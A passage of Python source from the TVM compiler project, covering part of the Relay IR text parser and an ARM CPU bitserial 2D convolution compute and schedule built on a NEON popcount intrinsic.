self.var_scopes.appendleft(deque())
def exit_var_scope(self) -> Scope[expr.Var]:
"""Pop off the current Var scope and return it."""
return self.var_scopes.popleft()
def mk_var(self, name: str, typ: ty.Type = None):
"""Create a new Var and add it to the Var scope."""
var = expr.Var(name, typ)
self.var_scopes[0].appendleft((name, var))
return var
def mk_global_var(self, name: str) -> expr.GlobalVar:
"""Create a new GlobalVar and add it to the GlobalVar scope."""
if name in self.global_vars:
raise ParseError(f"duplicate global var \"{name}\"")
var = expr.GlobalVar(name)
self.global_vars[name] = var
return var
def enter_type_param_scope(self) -> None:
"""Enter a new TypeVar scope so it can be popped off later."""
self.type_var_scopes.appendleft(deque())
def exit_type_param_scope(self) -> Scope[ty.TypeVar]:
"""Pop off the current TypeVar scope and return it."""
return self.type_var_scopes.popleft()
def mk_typ(self, name: str, kind: ty.Kind) -> ty.TypeVar:
"""Create a new TypeVar and add it to the TypeVar scope."""
typ = ty.TypeVar(name, kind)
self.type_var_scopes[0].appendleft((name, typ))
return typ
def mk_global_typ_var(self, name, kind):
# (str, ty.Kind) -> ty.GlobalTypeVar
"""Create a new TypeVar and add it to the TypeVar scope."""
typ = ty.GlobalTypeVar(name, kind)
self._check_existing_typ_expr(name, typ)
self.global_type_vars[name] = typ
return typ
# TODO: rethink whether we should have type constructors mixed with type vars.
def mk_global_typ_cons(self, name, cons):
self._check_existing_typ_expr(name, cons)
self.global_type_vars[name] = cons
def _check_existing_typ_expr(self, name, new_expr):
if name in self.global_type_vars:
new_typ_name = self._type_expr_name(new_expr)
existing_typ_name = self._type_expr_name(self.global_type_vars[name])
raise ParseError(
f"{new_typ_name} `{name}` conflicts with existing {existing_typ_name}")
def _type_expr_name(self, e):
if isinstance(e, adt.Constructor):
return f"`{e.belong_to.var.name}` ADT constructor"
elif isinstance(e, ty.GlobalTypeVar):
if e.kind == ty.Kind.AdtHandle:
return f"ADT definition"
return "function definition"
def visitProjection(self, ctx):
return expr.TupleGetItem(self.visit(ctx.expr()), self.visit(ctx.NAT()))
def visitTerminal(self, node) -> Union[expr.Expr, int, float]:
"""Visit lexer tokens that aren't ignored or visited by other functions."""
node_type = node.getSymbol().type
node_text = node.getText()
if node_type == RelayLexer.NAT:
return int(node_text)
if node_type == RelayLexer.FLOAT:
return float(node_text[:-1])
if node_type == RelayLexer.BOOL_LIT:
if node_text == "True":
return True
if node_text == "False":
return False
raise ParseError("unrecognized BOOL_LIT: `{}`".format(node_text))
if node_type == RelayLexer.QUOTED_STRING:
return literal_eval(node_text)
raise ParseError(f"unhandled terminal \"{node_text}\" of type `{node_type}`")
def visitGeneralIdent(self, ctx):
name = ctx.getText()
# Look through all type prefixes for a match.
for type_prefix in TYPE_PREFIXES:
if name.startswith(type_prefix):
return ty.scalar_type(name)
# Next, look it up in the local then global type params.
type_param = lookup(self.type_var_scopes, name)
if type_param is None:
type_param = self.global_type_vars.get(name, None)
if type_param is not None:
return type_param
# Check if it's an operator.
op_name = ".".join([name.getText() for name in ctx.CNAME()])
if op_name in FUNC_OPS:
return FuncOp(FUNC_OPS[op_name])
return ExprOp(op.get(op_name))
def visitGlobalVar(self, ctx):
var_name = ctx.CNAME().getText()
global_var = self.global_vars.get(var_name, None)
if global_var is None:
raise ParseError(f"unbound global var `{var_name}`")
return global_var
def visitLocalVar(self, ctx):
var_name = ctx.CNAME().getText()
local_var = lookup(self.var_scopes, var_name)
if local_var is None:
raise ParseError(f"unbound local var `{var_name}`")
return local_var
def visitGraphVar(self, ctx):
return self.graph_expr[int(ctx.NAT().getText())]
def visit_list(self, ctx_list) -> List[Any]:
""""Visit a list of contexts."""
# type: RelayParser.ContextParserRuleContext
assert isinstance(ctx_list, list)
return [self.visit(ctx) for ctx in ctx_list]
def getTypeExpr(self, ctx) -> Optional[ty.Type]:
"""Return a (possibly None) Relay type."""
# type: : Optional[RelayParser.Type_Context]
if ctx is None:
return None
return self.visit(ctx)
def visitProg(self, ctx: RelayParser.ProgContext) -> Union[expr.Expr, module.Module]:
self.meta = None
if ctx.METADATA():
header, data = str(ctx.METADATA()).split("\n", 1)
assert header == "METADATA:"
self.meta = tvm.load_json(data)
if ctx.defn():
self.visit_list(ctx.defn())
return self.module
if ctx.expr():
return self.visit(ctx.expr())
return self.module
# Exprs
def visitOpIdent(self, ctx) -> op.Op:
op_name = ".".join([name.getText() for name in ctx.CNAME()])
if op_name in FUNC_OPS:
return FuncOp(FUNC_OPS[op_name])
return ExprOp(op.get(op_name))
# pass through
def visitParen(self, ctx: RelayParser.ParenContext) -> expr.Expr:
return self.visit(ctx.expr())
# pass through
def visitBody(self, ctx: RelayParser.BodyContext) -> expr.Expr:
return self.visit(ctx.expr())
def visitScalarFloat(self, ctx: RelayParser.ScalarFloatContext) -> expr.Constant:
return expr.const(self.visit(ctx.FLOAT()))
def visitScalarInt(self, ctx: RelayParser.ScalarIntContext) -> expr.Constant:
return expr.const(self.visit(ctx.NAT()))
def visitScalarBool(self, ctx: RelayParser.ScalarBoolContext) -> expr.Constant:
return expr.const(self.visit(ctx.BOOL_LIT()))
def visitNeg(self, ctx: RelayParser.NegContext) -> Union[expr.Constant, expr.Call]:
val = self.visit(ctx.expr())
if isinstance(val, expr.Constant) and val.data.asnumpy().ndim == 0:
# fold Neg in for scalars
return expr.const(-val.data.asnumpy().item())
return op.negative(val)
def visitTuple(self, ctx: RelayParser.TupleContext) -> expr.Tuple:
tup = self.visit_list(ctx.expr())
return expr.Tuple(tup)
def visitLet(self, ctx: RelayParser.LetContext) -> expr.Let:
"""Desugar various sequence constructs to Relay Let nodes."""
if ctx.var() is None:
# anonymous identity
ident = "_"
typ = None
var = self.mk_var(ident, typ)
else:
var = self.visitVar(ctx.var())
self.enter_var_scope()
value = self.visit(ctx.expr(0))
self.exit_var_scope()
body = self.visit(ctx.expr(1))
return expr.Let(var, value, body)
def visitBinOp(self, ctx: RelayParser.BinOpContext) -> expr.Call:
"""Desugar binary operators."""
arg0, arg1 = self.visit_list(ctx.expr())
relay_op = BINARY_OPS.get(ctx.op.type)
if relay_op is None:
raise ParseError("unimplemented binary op.")
return relay_op(arg0, arg1)
@spanify
def visitVar(self, ctx: RelayParser.VarContext) -> expr.Var:
"""Visit a single variable."""
ident = ctx.localVar()
if ident is None:
raise ParseError("only local ids may be used in vars.")
typeExpr = self.getTypeExpr(ctx.typeExpr())
return self.mk_var(ident.getText()[1:], typeExpr)
def visitVarList(self, ctx: RelayParser.VarListContext) -> List[expr.Var]:
return self.visit_list(ctx.var())
# TODO: support a larger class of values than just Relay exprs
def visitAttr(self, ctx: RelayParser.AttrContext) -> Tuple[str, expr.Expr]:
return (ctx.CNAME().getText(), self.visit(ctx.expr()))
def visitArgNoAttr(self, ctx: RelayParser.ArgNoAttrContext):
return (self.visit_list(ctx.varList().var()), None)
def visitAttrSeq(self, ctx: RelayParser.AttrSeqContext) -> Dict[str, expr.Expr]:
return dict(self.visit_list(ctx.attr()))
def visitArgWithAttr(self, ctx: RelayParser.AttrSeqContext) \
-> Tuple[List[expr.Var], Dict[str, expr.Expr]]:
return (self.visit_list(ctx.var()), self.visitAttrSeq(ctx.attrSeq()))
def visitArgList(self, ctx: RelayParser.ArgListContext) \
-> Tuple[Optional[List[expr.Var]], Optional[Dict[str, expr.Expr]]]:
var_list = self.visit(ctx.varList()) if ctx.varList() else None
attr_list = self.visit(ctx.attrList()) if ctx.attrList() else None
return (var_list, attr_list)
def visitMeta(self, ctx: RelayParser.MetaContext):
type_key = str(ctx.CNAME())
index = int(self.visit(ctx.NAT()))
return self.meta[type_key][index]
def mk_func(
self,
ctx: Union[RelayParser.FuncContext, RelayParser.DefnContext]) \
-> expr.Function:
"""Construct a function from either a Func or Defn."""
# Enter var scope early to put params in scope.
self.enter_var_scope()
# Capture type params in params.
self.enter_type_param_scope()
type_params = ctx.typeParamList()
if type_params is not None:
type_params = type_params.generalIdent()
assert type_params
for ty_param in type_params:
name = ty_param.getText()
self.mk_typ(name, ty.Kind.Type)
var_list, attr_list = self.visit(ctx.argList())
if var_list is None:
var_list = []
ret_type = self.getTypeExpr(ctx.typeExpr())
body = self.visit(ctx.body())
# NB(@jroesch): you must stay in the type parameter scope until
# after you exit the body, you can reference the type parameters
# of your parent scopes.
type_params = list(self.exit_type_param_scope())
if type_params:
_, type_params = zip(*type_params)
self.exit_var_scope()
attrs = tvm.make.node("DictAttrs", **attr_list) if attr_list is not None else None
return expr.Function(var_list, body, ret_type, type_params, attrs)
@spanify
def visitFunc(self, ctx: RelayParser.FuncContext) -> expr.Function:
return self.mk_func(ctx)
# TODO: how to set spans for definitions?
# @spanify
def visitFuncDefn(self, ctx: RelayParser.DefnContext) -> None:
ident_name = ctx.globalVar().getText()[1:]
ident = self.mk_global_var(ident_name)
self.module[ident] = self.mk_func(ctx)
def handle_adt_header(
self,
ctx: Union[RelayParser.ExternAdtDefnContext, RelayParser.AdtDefnContext]):
"""Handles parsing of the name and type params of an ADT definition."""
adt_name = ctx.generalIdent().getText()
adt_var = self.mk_global_typ_var(adt_name, ty.Kind.AdtHandle)
# parse type params
type_params = ctx.typeParamList()
if type_params is None:
type_params = []
else:
type_params = [self.mk_typ(type_ident.getText(), ty.Kind.Type)
for type_ident in type_params.generalIdent()]
return adt_var, type_params
def visitExternAdtDefn(self, ctx: RelayParser.ExternAdtDefnContext):
# TODO(weberlo): update this handler once extern is implemented
self.enter_type_param_scope()
adt_var, type_params = self.handle_adt_header(ctx)
# update module being built
self.module[adt_var] = adt.TypeData(adt_var, type_params, [])
self.exit_type_param_scope()
def visitAdtDefn(self, ctx: RelayParser.AdtDefnContext):
self.enter_type_param_scope()
adt_var, type_params = self.handle_adt_header(ctx)
# parse constructors
adt_cons_defns = ctx.adtConsDefnList()
if adt_cons_defns is None:
adt_cons_defns = []
else:
adt_cons_defns = adt_cons_defns.adtConsDefn()
parsed_constructors = []
for cons_defn in adt_cons_defns:
inputs = [self.visit(inp) for inp in cons_defn.typeExpr()]
cons_defn_name = cons_defn.constructorName().getText()
cons_defn = adt.Constructor(cons_defn_name, inputs, adt_var)
self.mk_global_typ_cons(cons_defn_name, cons_defn)
parsed_constructors.append(cons_defn)
# update module being built
self.module[adt_var] = adt.TypeData(adt_var, type_params, parsed_constructors)
self.exit_type_param_scope()
def visitMatch(self, ctx: RelayParser.MatchContext):
match_type = ctx.matchType().getText()
if match_type == "match":
complete_match = True
elif match_type == "match?":
complete_match = False
else:
raise RuntimeError(f"unknown match type {match_type}")
# TODO: Will need some kind of type checking to know which ADT is being
# matched on.
match_data = self.visit(ctx.expr())
match_clauses = ctx.matchClauseList()
if match_clauses is None:
match_clauses = []
else:
match_clauses = match_clauses.matchClause()
parsed_clauses = []
for clause in match_clauses:
constructor_name = clause.constructorName().getText()
constructor = self.global_type_vars[constructor_name]
self.enter_var_scope()
patternList = clause.patternList()
if patternList is None:
patterns = []
else:
patterns = [self.visit(pattern) for pattern in patternList.pattern()]
clause_body = self.visit(clause.expr())
self.exit_var_scope()
# TODO: Do we need to pass `None` if it's a 0-arity cons, or is an empty list fine?
parsed_clauses.append(adt.Clause(
adt.PatternConstructor(
constructor,
patterns
),
clause_body
))
return adt.Match(match_data, parsed_clauses, complete=complete_match)
def visitPattern(self, ctx: RelayParser.PatternContext):
text = ctx.getText()
if text == "_":
return adt.PatternWildcard()
elif text.startswith("%"):
text = ctx.localVar().getText()
typ = ctx.typeExpr()
if typ is not None:
typ = self.visit(typ)
var = self.mk_var(text[1:], typ=typ)
return adt.PatternVar(var)
else:
raise ParseError(f"invalid pattern syntax \"{text}\"")
def visitCallNoAttr(self, ctx: RelayParser.CallNoAttrContext):
return (self.visit_list(ctx.exprList().expr()), None)
def visitCallWithAttr(self, ctx: RelayParser.CallWithAttrContext):
return (self.visit_list(ctx.expr()), self.visit(ctx.attrSeq()))
def call(self, func, args, attrs, type_args):
if isinstance(func, OpWrapper):
return func(args, attrs, type_args)
elif isinstance(func, adt.Constructor):
return func(*args)
return expr.Call(func, args, attrs, type_args)
@spanify
def visitCall(self, ctx: RelayParser.CallContext):
# type: (RelayParser.CallContext) -> expr.Call
func = self.visit(ctx.expr())
args, attrs = self.visit(ctx.callList())
res = self.call(func, args, attrs, [])
return res
@spanify
def visitIfElse(self, ctx: RelayParser.IfElseContext):
# type: (RelayParser.IfElseContext) -> expr.If
"""Construct a Relay If node. Creates a new scope for each branch."""
cond = self.visit(ctx.expr())
self.enter_var_scope()
true_branch = self.visit(ctx.body(0))
self.exit_var_scope()
self.enter_var_scope()
false_branch = self.visit(ctx.body(1))
self.exit_var_scope()
return expr.If(cond, true_branch, false_branch)
@spanify
def visitGraph(self, ctx: RelayParser.GraphContext):
# type: (RelayParser.GraphContext) -> expr.Expr
"""Visit a graph variable assignment."""
graph_nid = int(ctx.graphVar().getText()[1:])
self.enter_var_scope()
value = self.visit(ctx.expr(0))
self.exit_var_scope()
if graph_nid != len(self.graph_expr):
raise ParseError(
"expected new graph variable to be `%{}`,".format(len(self.graph_expr)) + \
"but got `%{}`".format(graph_nid))
self.graph_expr.append(value)
kont = self.visit(ctx.expr(1))
return kont
# Types
# pylint: disable=unused-argument
def visitIncompleteType(self, ctx: RelayParser.IncompleteTypeContext):
# type (RelayParser.IncompleteTypeContext) -> None:
return None
def visitTypeCallType(self, ctx: RelayParser.TypeCallTypeContext):
func = self.visit(ctx.generalIdent())
args = [self.visit(arg) for arg in ctx.typeParamList().generalIdent()]
return ty.TypeCall(func, args)
def visitParensShape(self, ctx: RelayParser.ParensShapeContext):
# type: (RelayParser.ParensShapeContext) -> int
return self.visit(ctx.shape())
def visitShapeList(self, ctx: RelayParser.ShapeListContext):
# type: (RelayParser.ShapeListContext) -> List[int]
return self.visit_list(ctx.shape())
def visitTensor(self, ctx: RelayParser.TensorContext):
return tuple(self.visit_list(ctx.expr()))
def visitTensorType(self, ctx: RelayParser.TensorTypeContext):
# type: (RelayParser.TensorTypeContext) -> ty.TensorType
"""Create a simple tensor type. No generics."""
shape = self.visit(ctx.shapeList())
dtype = self.visit(ctx.typeExpr())
if not isinstance(dtype, ty.TensorType):
raise ParseError("expected dtype to be a Relay base type.")
dtype = dtype.dtype
return ty.TensorType(shape, dtype)
def visitTupleType(self, ctx: RelayParser.TupleTypeContext):
# type: (RelayParser.TupleTypeContext) -> ty.TupleType
return ty.TupleType(self.visit_list(ctx.typeExpr()))
def visitFuncType(self, ctx: RelayParser.FuncTypeContext):
# type: (RelayParser.FuncTypeContext) -> ty.FuncType
types = self.visit_list(ctx.typeExpr())
arg_types = types[:-1]
ret_type = types[-1]
return ty.FuncType(arg_types, ret_type, [], None)
def make_parser(data):
# type: (str) -> RelayParser
"""Construct a RelayParser a given data stream."""
input_stream = InputStream(data)
lexer = RelayLexer(input_stream)
lexer.addErrorListener(StrictErrorListener(data))
token_stream = CommonTokenStream(lexer)
p = RelayParser(token_stream)
p.addErrorListener(StrictErrorListener(data))
return p
__source_name_counter__ = 0
class StrictErrorListener(ErrorListener):
"""This ErrorListener fail eagerly on all error, and report the program."""
def __init__(self, text):
self.text = text
def syntaxError(self, recognizer, offendingSymbol, line, column, msg, e):
raise Exception("Syntax Error in:\n" + self.text)
def reportAmbiguity(self, recognizer, dfa, startIndex, stopIndex, exact, ambigAlts, configs):
raise Exception("Ambiguity Error in:\n" + self.text)
def reportAttemptingFullContext(self,
recognizer,
dfa,
startIndex,
stopIndex,
conflictingAlts,
configs):
raise Exception("Attempting Full Context in:\n" + self.text)
def reportContextSensitivity(self, recognizer, dfa, startIndex, stopIndex, prediction, configs):
raise Exception("Context Sensitivity in:\n" + self.text)
def fromtext(data, source_name=None):
# type: (str, str) -> Union[expr.Expr, module.Module]
"""Parse a Relay program."""
if data == "":
raise ParseError("cannot parse the empty string.")
global __source_name_counter__
if source_name is None:
source_name = "source_file{0}".format(__source_name_counter__)
if isinstance(source_name, str):
source_name = SourceName(source_name)
tree = make_parser(data).prog()
return ParseTreeToRelayIR(source_name).visit(tree)
```
#### File: topi/arm_cpu/bitserial_conv2d.py
```python
from __future__ import absolute_import as _abs
import tvm
from tvm import autotvm
from tvm import relay
from .. import tag
from ..nn.pad import pad
from ..nn.bitserial_conv2d import bitserial_conv2d_nhwc, bitserial_conv2d_legalize
from ..nn.bitserial_util import bitpack, binary_op_multiplier
from ..nn.util import get_pad_tuple
from ..util import get_const_int, get_const_tuple
from .. import generic
def _kernel_vec_spatial_pack_nhwc(kernel, kernel_bits, VC, use_bitpack=True):
if use_bitpack:
kernel_q = bitpack(kernel, kernel_bits, pack_axis=2, bit_axis=2, pack_type='uint8')
else:
kernel_q = kernel
KH, KW, KB, CI, CO = kernel_q.shape
kvshape = (CO//VC, KH, KW, KB, VC, CI)
return tvm.compute(kvshape, lambda co, dh, dw, b, vc, ci: \
kernel_q[dh][dw][b][ci][co*VC+vc], name='kernel_vec')
@autotvm.register_topi_compute(bitserial_conv2d_nhwc, 'arm_cpu', 'direct')
def spatial_pack_nhwc(cfg, data, kernel, stride, padding, activation_bits, weight_bits,
pack_dtype, out_dtype, unipolar):
""" Compute convolution with pack on spatial axes. """
assert data.shape[0].value == 1, "spatial pack convolution only support batch size=1"
assert pack_dtype == 'uint8', "only support packing into uint8 bits"
assert out_dtype == 'int16', "only support output type of int16"
N, H, W, CI = get_const_tuple(data.shape)
if len(kernel.shape) == 4:
KH, KW, _, CO = get_const_tuple(kernel.shape)
CI_packed = CI // 8
else:
KH, KW, KB, CI_packed, CO = get_const_tuple(kernel.shape)
if isinstance(padding, int) or (isinstance(padding, (tuple, list)) and len(padding) == 2):
TPAD, LPAD, DPAD, RPAD = get_pad_tuple(padding, kernel)
else:
TPAD, LPAD, DPAD, RPAD = padding
if isinstance(stride, (tuple, list)):
HSTR, WSTR = stride
else:
HSTR, WSTR = stride, stride
HCAT, WCAT = KH-1, KW-1
PAD_H = H + (TPAD + DPAD)
PAD_W = W + (LPAD + RPAD)
OH = (PAD_H - KH) // HSTR + 1
OW = (PAD_W - KW) // WSTR + 1
oshape = (1, OH, OW, CO)
# Pad input channels of weights and data when it is not a multiple of 8
if CI_packed % 8 != 0:
CI_PAD = CI_packed % 8
CI_packed += CI_PAD
else:
CI_PAD = 0
# ==================== define configuration space ====================
n, oh, ow, co = cfg.axis(N), cfg.axis(OH), cfg.axis(OW), cfg.axis(CO)
ci, kh, kw = cfg.reduce_axis(CI_packed), cfg.reduce_axis(KH), cfg.reduce_axis(KW)
ib, kb = cfg.reduce_axis(activation_bits), cfg.reduce_axis(weight_bits)
co, vc = cfg.define_split('tile_co', co, num_outputs=2,
filter=lambda x: x.size[-1] == 8)
oh, vh = cfg.define_split('tile_oh', oh, num_outputs=2,
filter=lambda x: x.size[-1] >= 2)
ow, vw = cfg.define_split('tile_ow', ow, num_outputs=2,
filter=lambda x: x.size[-1] >= 2)
ci_o, ci_i = cfg.define_split("tile_ci", ci, num_outputs=2,
filter=lambda x: x.size[-1] == 8 or x.size[-1] == 16)
re_axes = cfg.define_reorder("reorder_0",
[n, oh, ow, co, vh, vw, kh, kw, ci_o, kb, ib, vc, ci_i],
policy='candidate', candidate=[
[n, oh, ow, co, vh, vw, kh, kw, ci_o, kb, ib, vc, ci_i],
[n, oh, ow, co, vh, vw, kw, kh, ci_o, kb, ib, vc, ci_i],])
# binary ops
cfg.add_flop(2 * N * OH * OW * CO * CI * KH * KW * binary_op_multiplier(pack_dtype))
# ====================
VC = cfg["tile_co"].size[-1]
VH = cfg["tile_oh"].size[-1]
VW = cfg["tile_ow"].size[-1]
data_q = bitpack(data, activation_bits, pack_axis=3, bit_axis=3, pack_type='uint8')
kernel_vec = _kernel_vec_spatial_pack_nhwc(kernel, weight_bits, VC, len(kernel.shape) == 4)
if kernel_vec.shape[-1] % 8 != 0 and CI_PAD != 0:
kernel_vec = pad(kernel_vec, [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, CI_PAD])
N, H, W, IB, CI = data_q.shape
OCO, KH, KW, KB, VC, CI = kernel_vec.shape
dvshape = (N, PAD_H//(VH*HSTR), PAD_W//(VW*WSTR), VH*HSTR+HCAT, VW*WSTR+WCAT, IB, CI)
ovshape = (1, OH // VH, OW // VW, CO // VC, VH, VW, VC)
if (TPAD != 0 and RPAD != 0):
data_pad = pad(data_q, (0, TPAD, LPAD, 0, 0), (0, DPAD, RPAD, 0, CI_PAD), name="data_pad")
elif CI_PAD != 0:
data_pad = pad(data_q, (0, 0, 0, 0, 0), (0, 0, 0, 0, CI_PAD), name="data_pad")
else:
data_pad = data_q
data_vec = tvm.compute(dvshape, lambda n, h, w, vh, vw, b, ci: \
data_pad[n][h*VH*HSTR+vh][w*VW*WSTR+vw][b][ci], name='data_vec')
ci = tvm.reduce_axis((0, CI), name='ci')
dh = tvm.reduce_axis((0, KH), name='dh')
dw = tvm.reduce_axis((0, KW), name='dw')
ib = tvm.reduce_axis((0, IB), name='ib')
kb = tvm.reduce_axis((0, KB), name='kb')
def _bipolar_conv(n, h, w, co, vh, vw, vc):
return tvm.sum((tvm.popcount(
kernel_vec[co, dh, dw, kb, vc, ci].astype('uint16') &
data_vec[n, h, w, vh*HSTR+dh, vw*WSTR+dw, ib, ci].astype('uint16'))
<< (kb + ib).astype('uint16')), axis=[dh, dw, kb, ib, ci])
def _unipolar_conv(n, h, w, co, vh, vw, vc):
return tvm.sum(
((tvm.popcount(kernel_vec[co, dh, dw, kb, vc, ci].astype('int16') &
data_vec[n, h, w, vh*HSTR+dh, vw*WSTR+dw, ib, ci].astype('int16')) -
tvm.popcount(~kernel_vec[co, dh, dw, kb, vc, ci].astype('int16') &
data_vec[n, h, w, vh*HSTR+dh, vw*WSTR+dw, ib, ci]).astype('int16'))
<< (kb + ib).astype('int16')), axis=[dh, dw, kb, ib, ci])
if unipolar:
conv_vec = tvm.compute(ovshape, _unipolar_conv, name='conv_vec', tag='unipolar')
else:
conv_vec = tvm.compute(ovshape, _bipolar_conv, name='conv_vec', tag='bipolar')
conv = tvm.compute(oshape, lambda n, h, w, co:
conv_vec[n][h//VH][w//VW][co//VC][h%VH][w%VW][co%VC].astype(out_dtype),
name='conv', tag='spatial_bitserial_conv_nhwc')
return conv
def _intrin_popcount(m, k_i, w_b, x_b, unipolar):
pack_dtype = 'uint8'
w = tvm.placeholder((w_b, m, k_i), dtype=pack_dtype, name='w')
x = tvm.placeholder((x_b, k_i,), dtype=pack_dtype, name='x')
k = tvm.reduce_axis((0, k_i), name='k')
bw = tvm.reduce_axis((0, w_b), name='bw')
bx = tvm.reduce_axis((0, x_b), name='bx')
if unipolar:
dtype = 'int16'
z = tvm.compute((m,), lambda i:
tvm.sum((tvm.popcount(w[bw, i, k].astype(dtype) & x[bx, k].astype(dtype)) -
tvm.popcount(~w[bw, i, k].astype(dtype) & x[bx, k].astype(dtype)))
<< (bw+bx).astype(dtype), axis=[bw, bx, k]), name='z')
else:
dtype = 'uint16'
z = tvm.compute((m,), lambda i:
tvm.sum(tvm.popcount(w[bw, i, k].astype(dtype) & x[bx, k].astype(dtype))
<< (bw+bx).astype(dtype), axis=[bw, bx, k]), name='z')
Wb = tvm.decl_buffer(w.shape, w.dtype,
name="W",
offset_factor=k_i,
strides=[tvm.var('ldw'), tvm.var('ldw'), 1]) # stride can be inferred
Xb = tvm.decl_buffer(x.shape, x.dtype,
name="X",
offset_factor=k_i,
strides=[tvm.var('ldw'), 1])
Zb = tvm.decl_buffer(z.shape, z.dtype,
name="Z",
offset_factor=1,
strides=[1])
def _intrin_func(ins, outs):
ww, xx = ins
zz = outs[0]
args_1 = tvm.const(1, 'uint32')
args_2 = tvm.const(2, 'uint32')
if unipolar:
vpadd = "llvm.arm.neon.vpadd.v8i8"
vpadalu = "llvm.arm.neon.vpadals.v16i8.v8i16"
full_dtype = 'int8x16'
half_dtype = 'int8x8'
return_dtype = 'int16x8'
else:
vpadd = "llvm.arm.neon.vpadd.v8u8"
vpadalu = "llvm.arm.neon.vpadalu.v16u8.v8u16"
full_dtype = 'uint8x16'
half_dtype = 'uint8x8'
return_dtype = 'uint16x8'
def _instr(index):
irb = tvm.ir_builder.create()
if index == 1: # reduce reset
irb.emit(zz.vstore(0, tvm.const(0, return_dtype)))
return irb.get()
# body and reduce update
cnts8 = [None] * 8
cnts4 = [None] * 4
cnts2 = [None] * 2
for bw in range(w_b):
for bx in range(x_b):
if k_i == 16:
for i in range(m):
w_ = ww.vload([bw, i, 0], 'uint8x16').astype(full_dtype)
x_ = xx.vload([bx, 0], 'uint8x16').astype(full_dtype)
if unipolar:
cnts = tvm.popcount(w_ & x_) - tvm.popcount(~w_ & x_)
else:
cnts = tvm.popcount(w_ & x_)
upper_half = tvm.call_pure_intrin(half_dtype, 'vectorhigh', cnts)
lower_half = tvm.call_pure_intrin(half_dtype, 'vectorlow', cnts)
cnts8[i] = upper_half + lower_half
for i in range(m//2):
cnts4[i] = tvm.call_llvm_intrin(half_dtype, vpadd,
args_1, cnts8[i*2], cnts8[i*2+1])
for i in range(m//4):
cnts2[i] = tvm.call_llvm_intrin(half_dtype, vpadd,
args_1, cnts4[i*2], cnts4[i*2+1])
cnts = tvm.call_pure_intrin(full_dtype, 'vectorcombine', cnts2[0], cnts2[1])
shifted_cnts = cnts << tvm.const(bw+bx, pack_dtype)
out = tvm.call_llvm_intrin(return_dtype, vpadalu,
args_2, zz.vload(0, return_dtype), shifted_cnts)
else: # ki == 8
for i in range(m):
w_ = ww.vload([bw, i, 0], 'uint8x8').astype(half_dtype)
x_ = xx.vload([bx, 0], 'uint8x8').astype(half_dtype)
if unipolar:
cnts8[i] = tvm.popcount(w_ & x_) - tvm.popcount(~w_ & x_)
else:
cnts8[i] = tvm.popcount(w_ & x_)
for i in range(m//2):
cnts4[i] = tvm.call_llvm_intrin(half_dtype, vpadd,
args_1, cnts8[i*2], cnts8[i*2+1])
for i in range(m//4):
cnts2[i] = tvm.call_llvm_intrin(half_dtype, vpadd,
args_1, cnts4[i*2], cnts4[i*2+1])
cnts = tvm.call_pure_intrin(full_dtype, 'vectorcombine', cnts2[0], cnts2[1])
shifted_cnts = cnts << tvm.const(bw+bx, pack_dtype)
out = tvm.call_llvm_intrin(return_dtype, vpadalu,
args_2, zz.vload(0, return_dtype), shifted_cnts)
irb.emit(zz.vstore(0, out))
return irb.get()
# body, reset, update
return _instr(0), _instr(1), _instr(2)
with tvm.build_config(offset_factor=1, partition_const_loop=True):
return tvm.decl_tensor_intrin(z.op, _intrin_func, binds={w: Wb, x:Xb, z:Zb})
# ARM specific schedule that using custom microkernel
def _schedule_spatial_conv2d_nhwc(cfg, s, data_pad, data_vec, kernel_vec,
conv_out, output, last, unipolar):
_, _, _, _, _, IB, CI = data_vec.shape
_, KH, KW, KB, _, _ = kernel_vec.shape
KB = get_const_int(KB)
IB = get_const_int(IB)
VC = cfg["tile_co"].size[-1]
VH = cfg["tile_oh"].size[-1]
VW = cfg["tile_ow"].size[-1]
##### Schedule data padding and packing
if data_pad is not None:
s[data_pad].compute_inline()
_, h, _, _, _, _, _ = s[data_vec].op.axis
cfg.define_split("tile_ah", cfg.axis(h), num_outputs=2, max_factor=32)
oh, ih = cfg["tile_ah"].apply(s, data_vec, h)
s[data_vec].parallel(oh)
#### Schedule kernel packing
co, _, _, _, _, _ = s[kernel_vec].op.axis
cfg.define_split("tile_bco", cfg.axis(co), num_outputs=2, max_factor=32)
oco, ico = cfg["tile_bco"].apply(s, kernel_vec, co)
s[kernel_vec].parallel(oco)
##### Schedule Convolution
n, oh, ow, co, vh, vw, vc = s[conv_out].op.axis
kh, kw, kb, ib, ci = s[conv_out].op.reduce_axis
ci_o, ci_i = cfg['tile_ci'].apply(s, conv_out, ci)
re_axes = cfg["reorder_0"].apply(s, conv_out,
[n, oh, ow, co, vh, vw, kh, kw, ci_o, kb, ib, vc, ci_i])
# Use microkernel
kfactor = cfg['tile_ci'].size[1]
if kfactor % 8 == 0:
pc = _intrin_popcount(VC, kfactor, KB, IB, unipolar)
s[conv_out].tensorize(kb, pc)
n, h, w, co = s[last].op.axis
co, vc = cfg['tile_co'].apply(s, last, co)
oh, vh = cfg['tile_oh'].apply(s, last, h)
ow, vw = cfg['tile_ow'].apply(s, last, w)
s[last].reorder(n, oh, ow, co, vh, vw, vc)
s[last].vectorize(vc)
if last != output:
s[last].compute_inline()
s[conv_out].compute_at(s[last], co)
s[last].parallel(oh)
return s
@autotvm.register_topi_schedule(generic.nn.schedule_bitserial_conv2d_nhwc, 'arm_cpu', 'direct')
def schedule_bitserial_conv2d_nhwc(cfg, outs):
"""Arm cpu schedule for bitserial conv2d"""
s = tvm.create_schedule([x.op for x in outs])
scheduled_ops = []
def traverse(op):
"""Traverse operators from computation graph"""
# inline all one-to-one-mapping operators except the last stage (output)
if tag.is_broadcast(op.tag):
if op not in s.outputs:
s[op].compute_inline()
for tensor in op.input_tensors:
if isinstance(tensor.op, tvm.tensor.ComputeOp) and tensor.op not in scheduled_ops:
traverse(tensor.op)
if 'spatial_bitserial_conv_nhwc' in op.tag:
output = op.output(0)
conv_out = op.input_tensors[0]
kernel_vec = conv_out.op.input_tensors[0]
kernel_q = kernel_vec.op.input_tensors[0]
data_vec = conv_out.op.input_tensors[1]
data_q = data_vec.op.input_tensors[0]
data = data_q.op.input_tensors[0]
data_pad = None
if isinstance(data_q.op, tvm.tensor.ComputeOp) and "pad" in data_q.op.tag:
data_pad = data_q
data_q = data
data = data.op.input_tensors[0]
unipolar = "unipolar" in conv_out.op.tag
_schedule_spatial_conv2d_nhwc(cfg, s, data_pad, data_vec, kernel_vec,
conv_out, output, outs[0], unipolar)
scheduled_ops.append(op)
traverse(outs[0].op)
return s
@bitserial_conv2d_legalize.register("arm_cpu")
def _bitserial_conv2d_legalize(attrs, inputs, arg_types):
